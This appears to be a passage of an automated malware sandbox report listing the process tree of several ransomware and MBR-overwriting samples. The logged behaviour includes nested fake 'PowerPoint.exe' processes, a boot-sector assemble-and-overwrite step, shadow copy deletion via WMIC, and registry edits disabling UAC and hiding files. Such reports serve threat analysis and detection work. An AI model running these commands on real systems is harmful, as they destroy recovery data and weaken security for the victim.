C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:35712
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12628
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:30944
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:8832
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:11936
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10344
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15056
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6712
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:10968 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:24140
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:11272
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15236
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:5456
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:26448
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21168
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:13324
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:7692
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:11432
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21604
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:31588
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6068
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:26400
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14864
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20296
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:28048 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:4680
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:11784
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14796
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6372
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:35872
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6208
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:38776
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14396
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:15908
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10976
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:15136
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:22120
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵
- Executes dropped EXE
PID:6416 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:10620
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:13300
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14392
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21148
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15916
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:24828
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14996
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6908
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21548
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:4992
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:6472
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:15260
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6828
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:28004
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:8944
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:30072
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:1348
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:39256
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:25176
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:15116
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:8540
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:7324 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:10420
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:21056
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:13356
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:22968
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:26352
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:21440 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:32736
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"7⤵PID:416
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5960
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:27748 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:5916
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵
- Writes to the Master Boot Record (MBR)
PID:30020 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:25736
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20768
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:10020
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20092
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:20604 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:13448
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:26160
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6052
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21376
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:13288
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:11260
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:7088
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21732
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6004
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:28164
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:13828
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:756
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:35780
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:12324
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:37868 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:11172
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:27824
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10888
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:20076
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵PID:4044
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:10644
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:30368
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:12436
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:5020
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21184
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14372
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6592
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21576
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:7896
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:28296
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:8904
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:35664
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:5352
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:31096 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:8728
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:12928
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:26760
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:14808
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:8056
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵PID:9236
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21084
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:2476
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21500
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:5860
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:27840
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:13660
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:22960
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:5324
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:30096
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:11844
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:16108
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:9660
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:26200
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:15132
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:9680
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵PID:9624
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵
- Writes to the Master Boot Record (MBR)
PID:11044 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6064
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21272
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:11872
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:25612
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:20068
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:21648
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:17040
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:10628
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:27504
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:35392
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"6⤵PID:11848
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:14988
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:6568
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:35560
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:5932
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:32316
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:5432
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:30512
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:11376
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:15036
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:920
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵PID:10660
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:10844
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵PID:21180
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:2972
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:25812
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:20020
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵
- Writes to the Master Boot Record (MBR)
PID:21560 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:5416
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵PID:27476
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:17260
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:2880
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵
- Writes to the Master Boot Record (MBR)
PID:28624 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:31436
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"5⤵PID:11224
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:14384
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵PID:35736
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:8004
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵
- Writes to the Master Boot Record (MBR)
PID:30924 -
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:11168
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵PID:560
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"4⤵PID:11752
-
-
-
C:\Users\Admin\AppData\Roaming\PowerPoint.exe"C:\Users\Admin\AppData\Roaming\PowerPoint.exe"3⤵PID:19988
-
-
-
C:\Users\Admin\AppData\Roaming\RedBoot.exe"C:\Users\Admin\AppData\Roaming\RedBoot.exe"2⤵
- Executes dropped EXE
PID:12740 -
C:\Users\Admin\54868942\protect.exe"C:\Users\Admin\54868942\protect.exe"3⤵
- Executes dropped EXE
PID:28112
-
-
C:\Users\Admin\54868942\assembler.exe"C:\Users\Admin\54868942\assembler.exe" -f bin "C:\Users\Admin\54868942\boot.asm" -o "C:\Users\Admin\54868942\boot.bin"3⤵
- Executes dropped EXE
PID:20144
-
-
C:\Users\Admin\54868942\overwrite.exe"C:\Users\Admin\54868942\overwrite.exe" "C:\Users\Admin\54868942\boot.bin"3⤵PID:10304
-
-
-
C:\Users\Admin\AppData\Roaming\RedEye.exe"C:\Users\Admin\AppData\Roaming\RedEye.exe"2⤵
- Executes dropped EXE
PID:23372
-
-
C:\Users\Admin\AppData\Roaming\Rensenware.exe"C:\Users\Admin\AppData\Roaming\Rensenware.exe"2⤵
- Executes dropped EXE
PID:37380 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 8563⤵PID:9420
-
-
-
C:\Users\Admin\AppData\Roaming\Rokku.exe"C:\Users\Admin\AppData\Roaming\Rokku.exe"2⤵
- Executes dropped EXE
PID:11116 -
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive3⤵PID:8084
-
-
-
C:\Users\Admin\AppData\Roaming\Satana.exe"C:\Users\Admin\AppData\Roaming\Satana.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:14300 -
C:\Users\Admin\AppData\Roaming\Satana.exe"C:\Users\Admin\AppData\Roaming\Satana.exe"3⤵PID:6920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 3844⤵
- Program crash
PID:9372
-
-
-
-
C:\Users\Admin\AppData\Roaming\Seftad.exe"C:\Users\Admin\AppData\Roaming\Seftad.exe"2⤵
- Executes dropped EXE
PID:6124
-
-
C:\Users\Admin\AppData\Roaming\SporaRansomware.exe"C:\Users\Admin\AppData\Roaming\SporaRansomware.exe"2⤵
- Executes dropped EXE
PID:6300
-
-
C:\Users\Admin\AppData\Roaming\ViraLock.exe"C:\Users\Admin\AppData\Roaming\ViraLock.exe"2⤵
- Adds Run key to start application
PID:10480 -
C:\Users\Admin\CGgwAcgA\jOIoAokc.exe"C:\Users\Admin\CGgwAcgA\jOIoAokc.exe"3⤵
- Adds Run key to start application
PID:26460 -
C:\Windows\SysWOW64\taskkill.exetaskkill /FI "USERNAME eq Admin" /F /IM EMMAgEYw.exe4⤵
- Kills process with taskkill
PID:6128
-
-
C:\ProgramData\sykUwIws\EMMAgEYw.exe"C:\ProgramData\sykUwIws\EMMAgEYw.exe"4⤵PID:8260
-
-
-
C:\ProgramData\sykUwIws\EMMAgEYw.exe"C:\ProgramData\sykUwIws\EMMAgEYw.exe"3⤵PID:18848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ViraLock"3⤵PID:9380
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 13⤵
- Modifies registry key
PID:4564
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 23⤵
- Modifies registry key
PID:25676
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
PID:22280
-
-
